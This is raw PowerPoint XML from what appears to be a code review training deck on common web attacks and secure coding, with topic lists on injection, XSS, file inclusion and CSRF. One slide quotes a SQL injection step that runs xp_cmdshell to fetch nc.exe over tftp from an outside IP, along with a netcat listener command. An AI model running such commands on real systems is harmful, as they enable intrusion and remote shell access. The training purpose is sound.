    <dgm:cxn modelId="{D3FDD237-583B-474B-87B6-667B9B93BFCA}" srcId="{6A7D4F19-77CC-4058-A8BD-12C640618041}" destId="{EC09F0C4-11A4-4685-955D-7C0E721300D1}" srcOrd="1" destOrd="0" parTransId="{16CFE064-DDD5-4E69-9498-B6303349ECEF}" sibTransId="{BF7F8A25-D7A8-4231-8137-B164E32A9270}"/>
    <dgm:cxn modelId="{4B81F946-CCBB-493D-B73A-9F2ACC874C07}" type="presOf" srcId="{2D9A80A0-12F0-40A2-B04D-8EB76FCBF56A}" destId="{6C7816E9-7D68-4433-A38B-0FE05BE05AE3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{1B11D630-8569-4B06-9D05-C1C47AE9E31D}" type="presOf" srcId="{2639C797-9C55-4EAC-9F7C-E35CE1DF07C8}" destId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{BFAACC9B-87C7-467D-B710-532549A2B666}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{6C7816E9-7D68-4433-A38B-0FE05BE05AE3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{9B2CCE8B-FCD1-4F70-B476-C61B6E958F91}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{BA8A7001-BD36-4678-AADC-828343D925FB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{3CE723C3-5831-4118-9054-BB866E6E8E4D}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{37913D2E-A331-41DB-A145-DFBDC5C285C4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{2915B34D-63A3-454F-A978-4A9BD24D7764}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{12A765C4-D218-430C-8AAD-5A0132499F70}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{D6B90611-B4DA-4200-BCB8-A98E1240AE2D}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{6BB7AE12-8FFF-4363-B4B2-A111088DC7F9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{CE0136D3-E581-4876-83D5-9B7B8E8BD3B5}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{C94A9979-DAE6-4A46-9CB8-9A874FBE78EE}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{17BD7867-DAE3-4543-BC9F-6FF7DAE39D8B}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{93EAA6A5-DA9B-432E-B184-06CFA2AEAB4C}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{0C80B688-D85F-4025-9C64-7BF6E53E1818}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{6DC8599D-7CB1-4123-8F0F-09542D7647F9}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList6"/>
    <dgm:cxn modelId="{8F8E27EE-819C-4135-9ACB-5B316CB64B49}" type="presParOf" srcId="{FFA9D03F-F979-4B62-939D-C244BD5BE4B3}" destId="{6CE46AD8-774B-4F24-A892-84B218E67284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8053F1-F830-4789-9A46-0318BC908E31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9127279-469E-4223-8836-A0D4E04DE47C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>More in doc file</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5FDD913-8073-49DB-9BC8-55261AEECDED}" type="parTrans" cxnId="{C97176A4-219C-47FA-A9EE-1FEFA7E35DDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8370185-19E7-42D5-96CC-F1AEDA162ABC}" type="sibTrans" cxnId="{C97176A4-219C-47FA-A9EE-1FEFA7E35DDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{813B9D4F-9F23-4E70-AF7E-A98924D94698}" type="pres">
      <dgm:prSet presAssocID="{0C8053F1-F830-4789-9A46-0318BC908E31}" presName="CompostProcess" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6F1E8DA6-B838-4E39-BB9E-5B322D1F36CD}" type="pres">
      <dgm:prSet presAssocID="{0C8053F1-F830-4789-9A46-0318BC908E31}" presName="arrow" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4EE042E5-1D3F-4DDD-881F-80DB55343DE7}" type="pres">
      <dgm:prSet presAssocID="{0C8053F1-F830-4789-9A46-0318BC908E31}" presName="linearProcess" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24BC1C25-2239-4E2E-AB14-1751E393CD1F}" type="pres">
      <dgm:prSet presAssocID="{69127279-469E-4223-8836-A0D4E04DE47C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13B31F57-23F2-46E7-A8C8-CDDF190DC673}" type="presOf" srcId="{0C8053F1-F830-4789-9A46-0318BC908E31}" destId="{813B9D4F-9F23-4E70-AF7E-A98924D94698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{B76848F2-39F4-4820-BD28-F03F709D87CC}" type="presOf" srcId="{69127279-469E-4223-8836-A0D4E04DE47C}" destId="{24BC1C25-2239-4E2E-AB14-1751E393CD1F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{C97176A4-219C-47FA-A9EE-1FEFA7E35DDE}" srcId="{0C8053F1-F830-4789-9A46-0318BC908E31}" destId="{69127279-469E-4223-8836-A0D4E04DE47C}" srcOrd="0" destOrd="0" parTransId="{B5FDD913-8073-49DB-9BC8-55261AEECDED}" sibTransId="{A8370185-19E7-42D5-96CC-F1AEDA162ABC}"/>
    <dgm:cxn modelId="{333173EC-457A-4A44-9554-05CA0074A77C}" type="presParOf" srcId="{813B9D4F-9F23-4E70-AF7E-A98924D94698}" destId="{6F1E8DA6-B838-4E39-BB9E-5B322D1F36CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{A09B5E15-E49D-4C88-8DF3-F82F61D7E61B}" type="presParOf" srcId="{813B9D4F-9F23-4E70-AF7E-A98924D94698}" destId="{4EE042E5-1D3F-4DDD-881F-80DB55343DE7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hProcess9"/>
    <dgm:cxn modelId="{00A32342-9E2B-400B-B20B-10AC15BEB155}" type="presParOf" srcId="{4EE042E5-1D3F-4DDD-881F-80DB55343DE7}" destId="{24BC1C25-2239-4E2E-AB14-1751E393CD1F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3E3BC-3818-40BF-B2E3-3B34DB6A894D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1272045" y="1243594"/>
          <a:ext cx="1099852" cy="12521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15CE1-7861-412E-8BD2-CABC72705C39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="980651" y="24386"/>
          <a:ext cx="1851503" cy="1295992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300" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Web Security Introduction</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1043928" y="87663"/>
        <a:ext cx="1724949" cy="1169438"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77E48B7E-DBFC-49B2-86E0-49F07C3A543E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2832154" y="147988"/>
          <a:ext cx="1346607" cy="1047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2832154" y="147988"/>
        <a:ext cx="1346607" cy="1047478"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99A9B830-6F31-4E30-9A88-7F5A9F15ABE6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="2807138" y="2699421"/>
          <a:ext cx="1099852" cy="12521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393544"/>
            <a:satOff val="-11078"/>
            <a:lumOff val="134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35732-6586-41C8-8FF4-81ECA2731828}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2515744" y="1480213"/>
          <a:ext cx="1851503" cy="1295992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Common Web Attack</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2579021" y="1543490"/>
        <a:ext cx="1724949" cy="1169438"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9C0580F1-B45A-4D66-AFF1-94134E6DCF61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4367248" y="1603816"/>
          <a:ext cx="1346607" cy="1047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4367248" y="1603816"/>
        <a:ext cx="1346607" cy="1047478"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3D024DA-7915-41C1-861E-840C3C4487C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4050837" y="2936041"/>
          <a:ext cx="1851503" cy="1295992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Secure Coding</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4114114" y="2999318"/>
        <a:ext cx="1724949" cy="1169438"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D61F05D5-0EC6-4D7B-9536-439E7FD70D0C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5902341" y="3059643"/>
          <a:ext cx="1346607" cy="1047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 dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5902341" y="3059643"/>
        <a:ext cx="1346607" cy="1047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816E9-7D68-4433-A38B-0FE05BE05AE3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="-1348246" y="1352666"/>
          <a:ext cx="4256420" cy="1551086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42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Injection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SQL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Command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Code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Email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…</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="4421" y="851283"/>
        <a:ext cx="1551086" cy="2553852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{37913D2E-A331-41DB-A145-DFBDC5C285C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="319171" y="1352666"/>
          <a:ext cx="4256420" cy="1551086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42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Cross Site Scripting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Reflected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Stored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DOM</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="1671838" y="851283"/>
        <a:ext cx="1551086" cy="2553852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6BB7AE12-8FFF-4363-B4B2-A111088DC7F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="1986590" y="1352666"/>
          <a:ext cx="4256420" cy="1551086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42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LFI/RFI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File Upload</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="3339257" y="851283"/>
        <a:ext cx="1551086" cy="2553852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{93EAA6A5-DA9B-432E-B184-06CFA2AEAB4C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="3654008" y="1352666"/>
          <a:ext cx="4256420" cy="1551086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42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Authentication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User Enumeration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Brute Force</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="5006675" y="851283"/>
        <a:ext cx="1551086" cy="2553852"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CE46AD8-774B-4F24-A892-84B218E67284}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="5321426" y="1352666"/>
          <a:ext cx="4256420" cy="1551086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42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Authorization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CSRF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Insecure </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Direct Object Reference</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="5400000">
        <a:off x="6674093" y="851283"/>
        <a:ext cx="1551086" cy="2553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8DA6-B838-4E39-BB9E-5B322D1F36CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="617219" y="0"/>
          <a:ext cx="6995160" cy="274478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C1C25-2239-4E2E-AB14-1751E393CD1F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1980247" y="823436"/>
          <a:ext cx="4269105" cy="10979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smtClean="0"/>
            <a:t>More in doc file</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2033843" y="877032"/>
        <a:ext cx="4161913" cy="990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5EF97-0A07-4DF0-BBCD-A4CE1C32DD4B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A4EF3-BF50-49D8-9923-D2279D05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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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7DA2AD-8B6D-4B11-9DB8-2B3523500D36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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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4A52A0-D54F-4D7A-AFA0-CDC09C97EA73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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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198214-EA23-4D84-BDB7-FA0F9876FB71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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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A63A1C-715D-4D2B-8320-0A10E7A5F4F4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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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45B7355-E613-48EF-BDD4-73ADB3AAC2E9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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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0BFCFA-3A18-4F22-AF9B-1298A87C6957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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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1E0965-3EF3-4C4C-A606-DCAF749A5EBB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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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92A045-BB81-467C-8DE1-436A9BFF1590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4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914" indent="-281121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4483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4277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4070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3863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3657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3450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3244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F7BF76-8AF2-4CE6-93E8-14A29DA65FBD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2926C-35A4-4A7C-9CCC-272CA60D8F45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2926C-35A4-4A7C-9CCC-272CA60D8F45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210681-5722-42D4-AED2-A53C5D082853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01FD1-CC80-4957-8CD7-268898063221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5FBDBF35-321D-4052-9637-12D2D83271D7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sz="1200" kern="12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01FD1-CC80-4957-8CD7-26889806322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01FD1-CC80-4957-8CD7-26889806322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2F6AB-0B83-453D-B06A-94842E4C3351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NZ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6DA9CB-EEB4-4BAB-94F7-0B10D49E56AF}" type="slidenum">
              <a:rPr lang="en-NZ" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-N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61DA0-2283-4AE9-A77D-9EA590A32A9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01FD1-CC80-4957-8CD7-26889806322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01FD1-CC80-4957-8CD7-26889806322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2716213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" b="0" i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558" y="2018732"/>
            <a:ext cx="1692322" cy="1692322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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tbl"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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="1497013"/>
            <a:ext cx="412750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751388" y="1497013"/>
            <a:ext cx="4129087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563" y="2810112"/>
            <a:ext cx="8026400" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="4800" b="0" kern="1200" spc="-150" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="36000">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="86000">
                      <a:schemeClr val="accent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marL="0" lvl="0" algn="l" defTabSz="914363" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F991336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12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2409886"/>
            <a:ext cx="9144000" cy="2162114"/>
            <a:chOff x="0" y="1635125"/>
            <a:chExt cx="9144000" cy="2162114"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8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>
              <a:off x="0" y="3566795"/>
              <a:ext cx="9144000" cy="230444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9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 flipV="1">
              <a:off x="0" y="1635125"/>
              <a:ext cx="9144000" cy="230444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Icon (256x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spc="-100" normalizeH="0" baseline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25642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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F99133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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F99133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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F99133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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F9913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9481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138"/>
            <a:ext cx="4040188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96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8138"/>
            <a:ext cx="4041775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96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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F99133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896-17FA-4D7B-A2F1-426CF484BE0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8EB-7C5A-44D6-B7EC-DC694F9913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2CE896-17FA-4D7B-A2F1-426CF484BE0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718EB-7C5A-44D6-B7EC-DC694F9913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3753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2" y="1596788"/>
            <a:ext cx="8237537" cy="184665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E896-17FA-4D7B-A2F1-426CF484BE0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18EB-7C5A-44D6-B7EC-DC694F99133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Bottom Mosaic - Green.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/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5040" y="8198"/>
            <a:ext cx="9144000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 spc="-100" normalizeH="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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.wmf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3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code Review Training Course.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Part 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Common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web Attack </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;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Secure 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812530"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>For VIB only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>namhabach@gmail.com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3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460375" y="1425040"/>
            <a:ext cx="8229600" cy="5248894"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 643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3252788" y="4766114"/>
            <a:ext cx="2219325" cy="1849437"/>
            <a:chOff x="3329" y="3155"/>
            <a:chExt cx="1398" cy="1165"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87080" name="Group 58"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3329" y="3155"/>
              <a:ext cx="1398" cy="1165"/>
              <a:chOff x="3585" y="3155"/>
              <a:chExt cx="1398" cy="1165"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="87082" name="Picture 50" descr="cm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85" y="3155"/>
                <a:ext cx="1279" cy="1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7083" name="Picture 57" descr="Funny Guy2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407" y="374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87081" name="Picture 63" descr="SQL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20" y="3360"/>
              <a:ext cx="443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73495" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="893763"/>
            <a:ext cx="8237537" cy="523220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Why It's Wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(3 of 3)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Your Worst Nightmare!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0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5094289" y="3946964"/>
            <a:ext cx="2603500" cy="457200"/>
            <a:chOff x="3745" y="3311"/>
            <a:chExt cx="1640" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87078" name="Rectangle 30"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3959" y="3330"/>
              <a:ext cx="1426" cy="252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 b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>nc.exe -l -p 31337</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="873506" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3745" y="3311"/>
              <a:ext cx="287" cy="288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6"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a: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865189" y="1503801"/>
            <a:ext cx="7261226" cy="1022350"/>
            <a:chOff x="545" y="828"/>
            <a:chExt cx="4574" cy="644"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87069" name="Group 45"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="545" y="1184"/>
              <a:ext cx="4280" cy="288"/>
              <a:chOff x="793" y="1456"/>
              <a:chExt cx="4280" cy="288"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="87076" name="Rectangle 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1008" y="1470"/>
                <a:ext cx="4065" cy="252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 dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent6"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>exec xp_cmdshell 'tftp -i 63.45.11.9 GET nc.exe c:\nc.exe'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="873505" name="Rectangle 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="793" y="1456"/>
                <a:ext cx="287" cy="288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accent6"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                    <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                  </a:rPr>
                  <a:t></a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="87070" name="Group 71"/>
            <p:cNvGrpSpPr>
